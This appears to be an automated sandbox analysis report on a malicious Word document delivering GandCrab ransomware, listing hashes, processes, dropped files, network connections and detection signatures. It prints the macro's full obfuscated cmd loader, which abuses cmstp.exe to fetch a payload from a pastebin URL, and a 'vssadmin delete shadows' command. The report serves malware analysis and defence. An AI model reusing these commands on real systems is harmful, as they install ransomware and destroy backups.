analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ce83b3100892dfa1e4584437a1c627c8afdd692ba9953f00aa8074d0e3aad888.doc

Full analysis: https://app.any.run/tasks/6bad4c67-4b4f-47a8-9625-17235609f50c
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: March 21, 2019, 01:55:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
squiblydoo
ransomware
gandcrab
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Wed Mar 20 08:04:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5:

F19D0DA748871517B373AF12A4BB12A9

SHA1:

F9AC090526E9ED22A0E2F7303F2649844DD19CFD

SHA256:

CE83B3100892DFA1E4584437A1C627C8AFDD692BA9953F00AA8074D0E3AAD888

SSDEEP:

1536:8BHYRutkxdA+Ml4tf9v8Z1nRQWSRNSi+T+a9:8BKuejtJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SQUIBLYDOO was detected

      • cmstp.exe (PID: 2892)
    • Application was dropped or rewritten from another process

      • 21146.exe (PID: 2468)
    • Writes file to Word startup folder

      • 21146.exe (PID: 2468)
    • Actions looks like stealing of personal data

      • 21146.exe (PID: 2468)
    • Renames files like Ransomware

      • 21146.exe (PID: 2468)
    • Dropped file may contain instructions of ransomware

      • 21146.exe (PID: 2468)
    • Deletes shadow copies

      • cmd.exe (PID: 2588)
    • Connects to CnC server

      • 21146.exe (PID: 2468)
    • Changes settings of System certificates

      • 21146.exe (PID: 2468)
    • GANDCRAB detected

      • 21146.exe (PID: 2468)
  • SUSPICIOUS

    • Creates files in the user directory

      • cmstp.exe (PID: 2892)
      • cmd.exe (PID: 680)
      • 21146.exe (PID: 2468)
    • Executable content was dropped or overwritten

      • cmstp.exe (PID: 2892)
    • Creates files in the program directory

      • 21146.exe (PID: 2468)
    • Reads the cookies of Mozilla Firefox

      • 21146.exe (PID: 2468)
    • Starts CMD.EXE for commands execution

      • 21146.exe (PID: 2468)
    • Adds / modifies Windows certificates

      • 21146.exe (PID: 2468)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 320)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 320)
    • Dropped object may contain Bitcoin addresses

      • 21146.exe (PID: 2468)
    • Dropped object may contain TOR URL's

      • 21146.exe (PID: 2468)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 26
Paragraphs: 1
Lines: 1
Company:
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 23
Words: 4
Pages: 1
ModifyDate: 2019:03:20 08:04:00
CreateDate: 2019:02:28 14:52:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: Admin
Template: Normal
Comments: -
Keywords: -
Author: Admin
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
7
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs #SQUIBLYDOO cmstp.exe #GANDCRAB 21146.exe cmd.exe vssadmin.exe no specs vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
320"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ce83b3100892dfa1e4584437a1c627c8afdd692ba9953f00aa8074d0e3aad888.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
680cmd /V /C set "V=s" && !V!et "V0=\" && !V!et "V93=e" && !V!et "V87=i" && !V!et "V5=A" && !V!et "V4=N" && !V!et "V79=d" && c!V5!ll !V!et "V44=%!V5!PP!V79!!V5!T!V5!%" && c!V5!ll !V!et "V3=%R!V5!!V4!!V79!OM%" && !V!et "V36=!V44!!V0!M!V87!cro!V!oft!V0!T!V93!mplat!V93!s!V0!!V3!.txt" && !V!et "V57="^" && (For %i in ("[v!V93!r!V!ion]" "!V!ignatur!V93!=$Wi!V4!dow!V! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!V93!faultIn!V!tall_Singl!V93!U!V!er]" "UnR!V93!gi!V!t!V93!rOCXs=V30" "[V30]" "%11%\%V1_1%%V1_2%%V1_3%,NI,%V64_1%%V64_2%%V64_3%%V64_4%%V64_5%%V64_6%%V64_7%%V64_8%%V64_9%%V64_10%%V64_11%%V64_12%%V64_13%%V64_14%%V64_15%%V64_16%" "[!V!tring!V!]" "V64_1=ht" "V64_2=tp" "V64_3=:/" "V64_4=/p" "V64_5=as" "V64_6=te" "V64_7=bi" "V64_8=n." "V64_9=co" "V64_10=m/" "V64_11=ra" "V64_12=w/" "V64_13=Q0" "V64_14=E8" "V64_15=fd" "V64_16=wn" "V1_2=rO" "V1_1=sC" "V1_3=bJ" ) do @echo %~i)>"!V36!" && echo !V!erv!V87!ceNam!V93!=!V57! !V57!>>!V36! && echo !V!hortSvcN!V5!me=!V57! !V57!>>!V36! && c!V5!ll !V!et "V50=%WI!V4!!V79!IR%" && !V!t!V5!rt "" !V50!!V0!Sy!V!t!V93!m32!V0!cm!V!tp.!V93!x!V93! /s /ns "!V36!"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2892C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\16350.txt"C:\Windows\System32\cmstp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
2468"C:\Users\admin\AppData\Roaming\Microsoft\21146.exe" C:\Users\admin\AppData\Roaming\Microsoft\21146.exe
cmstp.exe
User:
admin
Integrity Level:
MEDIUM
2588"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quietC:\Windows\system32\cmd.exe
21146.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1552vssadmin delete shadows /all /quietC:\Windows\system32\vssadmin.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2688C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 589
Read events
1 187
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
424
Text files
325
Unknown types
17

Dropped files

PID
Process
Filename
Type
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9CD3.tmp.cvr
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF22D37F7CABCE6718.TMP
MD5:
SHA256:
2892cmstp.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\Q0E8fdwn[1].txtxml
MD5:091105EEE6E5D753DB6A01B38EE4A8B1
SHA256:3F82C323C22931B416F1F7D85CEBB8799B1FF129DDEAE18BE0CEA6ACAFEA5B89
680cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\Templates\16350.txtini
MD5:D60E2B8CD42C0A45713D3288DDA63FA3
SHA256:313716627353904D047E1EBEFA01D993F78073C79F029DEC2157318F374E8A6F
320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9509D00F.wmfwmf
MD5:9B958D431B80584579043950B6329CC2
SHA256:0C014D127F39FDEEDFA2229D89442011E65B0B09A38F748231D64FCE5E29224E
320WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:85EE808BAA18F1A84051BFDF696CDD2D
SHA256:8C1CD36AA0F0CBDE019767E80FEEDB92987197CBDDCF4278E1969187577B897C
2892cmstp.exeC:\Users\admin\AppData\Roaming\Microsoft\21146.exeexecutable
MD5:514EFCDD01942A69FCB96B5D02B9E096
SHA256:CC0F162476460B22977AD7310773646FBECFB98C00C0105DBBEC9D52159F2B6F
320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9686231B-097C-423E-964E-83AB7289742A}.tmpbinary
MD5:3C74C3EF5F06B7336E6C3A3899A88DE7
SHA256:448685554C80805D1DDC477127857FD466C8B5AB213AF85F2B138F8450B9216C
246821146.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-500\LOPYR-MANUAL.txttext
MD5:02E87D81F2C3A1D82493F32186F1CD34
SHA256:DD6847153EC03F80BC5B517C17495514E912FE1372CDA46CD864D3F99AF82BE5
246821146.exeC:\PerfLogs\Admin\LOPYR-MANUAL.txttext
MD5:02E87D81F2C3A1D82493F32186F1CD34
SHA256:DD6847153EC03F80BC5B517C17495514E912FE1372CDA46CD864D3F99AF82BE5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2892
cmstp.exe
GET
200
104.20.209.21:80
http://pastebin.com/raw/Q0E8fdwn
US
xml
206 Kb
shared
2468
21146.exe
GET
301
107.173.49.208:80
http://www.kakaocorp.link/
US
html
162 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2892
cmstp.exe
104.20.209.21:80
pastebin.com
Cloudflare Inc
US
shared
2468
21146.exe
107.173.49.208:80
www.kakaocorp.link
ColoCrossing
US
malicious
2468
21146.exe
107.173.49.208:443
www.kakaocorp.link
ColoCrossing
US
malicious

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
www.kakaocorp.link
  • 107.173.49.208
malicious

Threats

PID
Process
Class
Message
2892
cmstp.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2892
cmstp.exe
A Network Trojan was detected
MALWARE [PTsecurity] Squiblydoo Scriptlet
2468
21146.exe
A Network Trojan was detected
MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server
2468
21146.exe
A Network Trojan was detected
MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server
2468
21146.exe
A Network Trojan was detected
MALWARE [PTsecurity] GandCrab v.5 SSL Connection
3 ETPRO signatures available at the full report
No debug info